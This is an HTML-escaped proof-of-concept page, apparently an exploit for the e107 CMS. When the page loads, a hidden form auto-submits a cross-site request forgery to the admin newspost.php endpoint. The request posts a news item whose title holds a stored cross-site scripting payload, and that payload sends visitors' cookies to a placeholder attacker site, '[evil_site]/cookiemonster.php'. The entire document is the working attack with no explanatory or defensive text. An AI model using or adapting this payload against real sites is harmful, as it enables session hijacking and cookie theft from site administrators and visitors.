&lt;html&gt;
&lt;body onload=&quot;document.formCSRF.submit();&quot;&gt;
    &lt;form method=&quot;POST&quot; name=&quot;formCSRF&quot; 
action=&quot;http://[site]/e107_admin/newspost.php?create&quot;&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;cat_id&quot; value=&quot;1&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_title&quot; 
value=&quot;&lt;script&gt;location.href=&#039;http://[evil_site]/cookiemonster.php?cookie=&#039;+document.cookie;&lt;/script&gt;&quot;
        &lt;input type=&quot;hidden&quot; name=&quot;news_summary&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;data&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;sizeselect&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;preimageselect&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_extended&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;extended&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;sizeselect&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;preimageselect&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;file_userfile[]&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;uploadtype[]&quot; value=&quot;resize&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;resize_value&quot; value=&quot;100&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_allow_comments&quot; value=&quot;0&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_rendertype&quot; value=&quot;0&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_start&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_end&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_datestamp&quot; value=&quot;&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_userclass[0]&quot; value=&quot;1&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_author&quot; value=&quot;1&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;submit_news&quot; value=&quot;Post news to 
database&quot;/&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;news_id&quot; value=&quot;&quot;/&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
